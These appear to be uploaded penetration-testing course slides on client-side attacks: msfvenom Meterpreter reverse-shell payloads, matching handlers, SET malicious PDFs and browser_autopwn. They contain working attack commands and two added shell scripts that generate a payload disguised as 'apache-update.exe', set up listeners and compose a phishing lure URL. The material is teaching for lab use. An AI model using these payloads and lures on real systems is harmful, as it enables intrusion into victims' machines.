UNIT 5 Pentest

Uploaded by Oindrila Das

UNIT 5

Client-Side Attacks with Metasploit

Exploiting Weaknesses Beyond the Network Perimeter


Client Side Attacks
● Client-side attacks occur when a user opens or downloads malicious content. The flow of data is
reversed compared to server-side attacks: instead of the attacker connecting to a listening service, the
victim's own software fetches content from the attacker and then connects back out (for example, a
reverse shell). This is why a perimeter firewall that only filters inbound connections does not stop them.
● Client-side attacks are difficult to mitigate for organizations that allow Internet access, because the
"client" is any application that parses untrusted content: word processors, spreadsheets, PDF readers,
media players, Web browsers and their plugins, etc.
● Understanding and addressing client-side exploitation is a vital component of a comprehensive
cybersecurity strategy. It requires technical measures, such as prompt software updates and endpoint
protection, combined with user awareness, since the victim has to open the content for the attack to work.
● Some examples of client side attacks are :
● Malvertising
● Cross-Site Scripting (XSS)
● Cross-Site Request Forgery (CSRF)
● Watering Hole Attack
● Session Hijacking
● Zero-Day Exploit
● Malware
Using msfvenom to Generate Custom Payloads
Introduction to msfvenom:
● msfvenom is part of the Metasploit Framework, a comprehensive open-source platform for developing,
testing, and executing exploits. msfvenom is a stand-alone command-line utility (it replaced the older
msfpayload and msfencode tools) and does not require msfconsole to be running at the same time.
● It is specifically designed for generating payloads: the code (often shellcode) that runs on the target
once a vulnerability has been exploited or the user has been tricked into executing a file.
● msfvenom can generate payloads for different purposes, including reverse shells, bind shells,
Meterpreter stagers, raw shellcode for buffer overflows, and more, and can wrap them in many output
formats (exe, dll, elf, raw, C arrays, PowerShell, etc.).
Functionality:
● List payloads: msfvenom supports all standard Metasploit payloads; they can be listed with the
msfvenom --list payloads command.
● List encoders: as discussed earlier, msfvenom is a single utility that can both generate and encode a
payload. It supports all standard Metasploit encoders, which can be listed with the
msfvenom --list encoders command. Encoders exist to avoid bad characters and to fit format
constraints; they are not a reliable way to evade modern antivirus.
● List formats: while generating a payload, we need to tell msfvenom which file format the payload
should be produced in. The available formats are listed with the msfvenom --list formats command
(older versions used msfvenom --help-formats).
Using msfvenom to Generate Custom Payloads
Generating custom payloads for client-side attacks:
● Let's try generating a sample payload: a Windows Meterpreter reverse_tcp executable that calls back
to the attacker's IP and port (the original slide shows this step as a screenshot).

Once we have generated a payload, we need to set up a listener that will accept the reverse connection
once the payload is executed on the target system. The listener's PAYLOAD, LHOST and LPORT must
match exactly what was baked into the executable. The following command starts a Meterpreter
listener on IP address 192.168.44.134, port 8080:
msfconsole -x "use exploit/multi/handler; set PAYLOAD
windows/meterpreter/reverse_tcp; set LHOST 192.168.44.134; set LPORT 8080;
run; exit -y"
Now we send the payload to the victim disguised as an Apache update (apache-update.exe). The victim
needs to execute it for the exploit to complete: nothing happens until the file is run, which is why the
lure (file name, pretext and delivery channel) matters as much as the payload itself.
As soon as the victim executes the apache-update.exe file, we get an active Meterpreter session back
on the listener we set up earlier (as shown in the following screenshot).
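The slide's screenshot of the msfvenom step is missing from this extraction. The shell script below is an added example, not code from the slides or from Metasploit itself: it prints the msfvenom command for the apache-update.exe lure described above, writes a resource script for the matching listener so the payload and handler cannot drift apart, and sanity-checks the generated file. LHOST and LPORT default to the slide's values (192.168.44.134:8080); the file names gen_payload.sh and handler.rc, the encoder choice x86/shikata_ga_nai with three iterations, and the function names are our own assumptions. With LPORT=443 the same script produces the listener used in the SET section that follows.

```shell
#!/bin/sh
# Added example (not code from the original slides or from Metasploit itself).
# Builds the msfvenom command for the apache-update.exe lure and writes a
# resource script for the matching multi/handler. LHOST/LPORT default to the
# slide's values (192.168.44.134:8080); override them via the environment.
# The file names and function names are our own choices.

LHOST="${LHOST:-192.168.44.134}"
LPORT="${LPORT:-8080}"
PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
OUTFILE="${OUTFILE:-apache-update.exe}"

# Print the msfvenom invocation. -p selects the payload, -f the output format,
# -o the output file; -e/-i apply an encoder for N iterations (useful for bad
# characters, but not a reliable antivirus bypass).
msfvenom_cmd() {
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -e x86/shikata_ga_nai -i 3 -o %s\n' \
        "$PAYLOAD" "$LHOST" "$LPORT" "$OUTFILE"
}

# Write a Metasploit resource script for the handler. "exploit -j -z" runs the
# handler as a background job that keeps accepting sessions; the slide's
# one-liner ("run; exit -y") serves one session and then exits msfconsole.
write_handler_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
    echo "$rc"
}

# Sanity-check a generated file: it must exist and start with the "MZ" DOS
# header that every PE executable carries. Also emit its SHA-256 so the
# engagement log records exactly which binary was sent (the hash the blue
# team will see in AV/EDR alerts). Returns 1 on any failure.
check_payload() {
    f="$1"
    [ -f "$f" ] || { echo "no such file: $f" >&2; return 1; }
    magic=$(head -c 2 "$f")
    [ "$magic" = "MZ" ] || { echo "$f is not a PE executable" >&2; return 1; }
    sha256sum "$f" 2>/dev/null || shasum -a 256 "$f"
}

main() {
    echo "# payload generation:"
    msfvenom_cmd
    rc=$(write_handler_rc handler.rc)
    echo "# listener: msfconsole -q -r $rc"
    if command -v msfvenom >/dev/null 2>&1; then
        sh -c "$(msfvenom_cmd)" && check_payload "$OUTFILE"
    else
        echo "# msfvenom not found here; run the command above on the Metasploit host"
    fi
}

main
```

Start the listener with msfconsole -q -r handler.rc rather than the -x one-liner: because ExitOnSession is false and the handler runs as a job, several victims can connect back without restarting msfconsole. On a host without msfvenom the script only prints the command and writes the resource script.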
Introduction to Social Engineering Toolkit (SET)
● Social engineering is an art of manipulating human behavior in order to bypass the security
controls of the target system.
● The Social Engineering Toolkit (SET) is a powerful open-source tool designed for penetration testers, ethical
hackers, and security professionals to simulate social engineering attacks.
● Kali Linux ships SET by default; it integrates with Metasploit to launch targeted attacks. In the Kali
menu it is located under Exploitation Tools | Social Engineering Toolkit (the command is setoolkit).
● Features and Capabilities:
SET offers menu-driven spear-phishing campaigns, website cloning (credential harvesting), file-format
payloads, payload customization, and integration with Metasploit (it can hand generated payloads to a
Metasploit handler) for realistic and educational security assessments.
● Leveraging Social Engineering for Client-Side Exploitation:
SET exploits human psychology to deliver custom payloads, manipulates user trust for compromises,
and showcases the bypassing of technical controls for realistic simulations and continuous security
Launching Social Engineering Attacks
Generating malicious PDF:
1. Open the Social Engineering Toolkit and select the first option, Spear-Phishing Attack Vectors, as
shown in the following screenshot. Then select the second option, Create a File Format Payload.
2. Now select option 14 to use the Adobe util.printf() Buffer Overflow exploit. This is an old Adobe
Reader bug (CVE-2008-2992, Reader 8.1.2 and earlier), so it only works against a deliberately outdated
lab victim; the workflow, not this particular exploit, is the point.
3. Select option 1 to use Windows Reverse TCP Shell as the payload for the exploit. Then set the IP
address of the attacker's machine using the LHOST variable (in this case 192.168.44.134) and the port
to listen on (in this case 443). Note which payload you chose: the listener in the next step must be
configured with the same one. If you keep option 1 (a plain command shell), set PAYLOAD
windows/shell/reverse_tcp on the handler; the Meterpreter handler shown below matches the Windows
Meterpreter Reverse_TCP option instead.
4. Meanwhile, we also need to start a listener that will accept the reverse connection from our target
(SET also offers to start one for you at the end of the wizard). We can start it manually with:
msfconsole -x "use exploit/multi/handler; set PAYLOAD
windows/meterpreter/reverse_tcp; set LHOST 192.168.44.134; set LPORT 443;
run; exit -y"
5. On the other end, the victim receives the PDF file and opens it with a vulnerable version of Adobe
Reader.
6. Back on the listener (the attacker's system), we get a new Meterpreter shell, as shown in the following
screenshot.
Advanced Browser-Based Attacks using browser_autopwn

● "Autopwn" refers to automatic exploitation of the target. The autopwn module sets up most of
Metasploit's browser-based exploits in listening mode by automatically configuring them one after the
other, each with its own payload handler.
● On an incoming request, the module fingerprints the browser (and its plugins, such as Java or Flash)
with JavaScript and then launches only the set of matching exploits. Therefore, irrespective of which
browser the victim is using, if that browser has a known vulnerability, autopwn attacks it automatically
with the matching exploit modules.
Techniques for browser-based attacks:

Some browser-based attacks are as follows:

1. Cross-Site Scripting (XSS): injecting attacker-controlled script into a web page so that it runs in the victim's browser with
the privileges of the trusted site, where it can steal session tokens or perform actions as the user.
2. Drive-By Downloads: delivering malware automatically when users visit a compromised or malicious website, by exploiting
vulnerabilities in the browser or its plugins (this is what browser_autopwn automates).
3. Social Engineering: manipulating users through psychological tactics into clicking malicious links or disclosing sensitive
information.
4. Man-in-the-Browser (MitB): malware on the user's system that hooks the browser to intercept and modify web traffic, often
targeting login credentials and online banking sessions.
5. Clickjacking: hiding a legitimate clickable element (for example in a transparent iframe) beneath a harmless-looking decoy
so that the user's click performs an action they did not intend.
Overview of browser_autopwn module:
● Browser Autopwn is the easiest and quickest way to test browser vulnerabilities without the user having
to painfully learn everything there is about each exploit and the remote target before deployment. The
original auxiliary/server/browser_autopwn module has been superseded by
auxiliary/server/browser_autopwn2 (reference 4), which works the same way but with better exploit
selection and filtering options.
● This auxiliary module works in the following sequence:
1. The attacker runs the browser_autopwn auxiliary module.
2. A web server is started on the attacker's system. It hosts the fingerprinting page and the loaded
exploits, reachable over a specific URL.
3. The attacker sends the specially generated URL to the victim.
4. The victim opens the URL; the page fingerprints the browser, and the server responds with the
exploits that match it, each carrying the configured payload.
5. If the victim's browser is vulnerable to one of them, the exploit succeeds and the attacker gets a
Meterpreter shell on the corresponding handler.
Browser-based attacks using browser_autopwn
1. From msfconsole, select the module with the use auxiliary/server/browser_autopwn command, as
shown in the following screenshot. Then configure the LHOST variable (the IP the payloads will call
back to) and run the auxiliary module. SRVPORT defaults to 8080; URIPATH, if not set, is normally a
random string, so set it explicitly if you want a predictable link.
2. Running the module creates many different exploit/payload instances, each with its own handler,
because the victim might be using any kind of browser.
3. On the target system, the victim opens Internet Explorer and browses to the malicious URL
http://192.168.44.134:8080 (the URL we set up using the browser_autopwn module).
4. Back on our Metasploit system, we get a Meterpreter shell as soon as the victim opens the
specially crafted URL.
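As an added example (not the slides' or Metasploit's own code), the script below writes the resource script for this browser_autopwn setup, composes the lure URL from the same values so the link and the server cannot disagree, and refuses to start if SRVPORT is already taken. SRVHOST and SRVPORT follow the slide (192.168.44.134:8080); the path /update, the file name autopwn.rc, the port check and the use of browser_autopwn2 as the default module name are our assumptions.

```shell
#!/bin/sh
# Added example (not from the original slides or from Metasploit): writes a
# resource script for the browser_autopwn server and composes the lure URL
# from the same values. Defaults follow the slides (192.168.44.134, port 8080);
# the URIPATH value "/update" and the function names are our own choices.

SRVHOST="${SRVHOST:-192.168.44.134}"
SRVPORT="${SRVPORT:-8080}"
URIPATH="${URIPATH:-/update}"
# The slides use auxiliary/server/browser_autopwn; current Metasploit ships
# its successor auxiliary/server/browser_autopwn2 (reference 4).
MODULE="${MODULE:-auxiliary/server/browser_autopwn2}"

# Resource script: SRVHOST/SRVPORT bind the web server, URIPATH fixes the path
# (otherwise it is randomised per run), LHOST (as on the slides) is where the
# spawned payloads call back. "run -j" keeps the server as a background job so
# msfconsole stays usable while waiting for victims.
write_autopwn_rc() {
    rc="$1"
    cat > "$rc" <<EOF
use $MODULE
set SRVHOST $SRVHOST
set SRVPORT $SRVPORT
set URIPATH $URIPATH
set LHOST $SRVHOST
run -j
EOF
    echo "$rc"
}

# The URL to put in the phishing message; the path must match URIPATH exactly.
lure_url() {
    printf 'http://%s:%s%s\n' "$SRVHOST" "$SRVPORT" "$URIPATH"
}

# Returns 0 when nothing is listening on the given TCP port, 1 otherwise.
# Needed because the slides also put the msfvenom multi/handler on 8080.
port_is_free() {
    port="$1"
    if command -v ss >/dev/null 2>&1; then
        ! ss -ltn 2>/dev/null | awk '{print $4}' | grep -q ":$port\$"
    elif command -v netstat >/dev/null 2>&1; then
        ! netstat -ltn 2>/dev/null | awk '{print $4}' | grep -q ":$port\$"
    else
        return 0   # no tool to check with; assume free
    fi
}

main() {
    rc=$(write_autopwn_rc autopwn.rc)
    if port_is_free "$SRVPORT"; then
        echo "# start with: msfconsole -q -r $rc"
        echo "# send this link to the victim: $(lure_url)"
    else
        echo "# port $SRVPORT is already in use; change SRVPORT or stop the other handler" >&2
        return 1
    fi
}

main
```

The port check matters on this page: the msfvenom handler earlier was also bound to 8080, so running both on the same attacker host at the same time fails, and the second one to start will silently serve nothing. browser_autopwn spawns its own handlers for every exploit it loads, so no separate multi/handler is needed for this attack.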
Summary
Understanding client-side attack techniques is vital because they exploit human
behavior and are often the initial entry point for an intrusion. By recognizing and
addressing tactics like phishing and social engineering, security professionals can
fortify defenses, educate users, and reduce the risk posed by the weakest link in the
security chain: individuals and their interactions with technology.

We learned how to use various tools and techniques (msfvenom, SET and browser_autopwn) to launch
client-side attacks that bypass network perimeter restrictions by making the victim connect out to us.
Question & Answers
Opening the floor for Q & A
References
1. Sagar Rahalkar, Nipun Jaswal - The Complete ... oit (2019, Packt Publishing)
2. Himanshu Kumar - Learning Nessus for Penetration Testing: Master how to perform IT
infrastructure security vulnerability assessments using Nessus (2014, Packt Publishing)
3. Steve Manzuik, Andre Gold, Chris Gatford - Network Security Assessment: From Vulnerability to
Patch (2006, Syngress)
4. https://www.rapid7.com/blog/post/2015/07/15/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter-part-1/
5. https://www.oreilly.com/library/view/mastering-metasploit/9781788990615/b4495567-b19f-4c70-a904-65d6f32fa012.xhtml
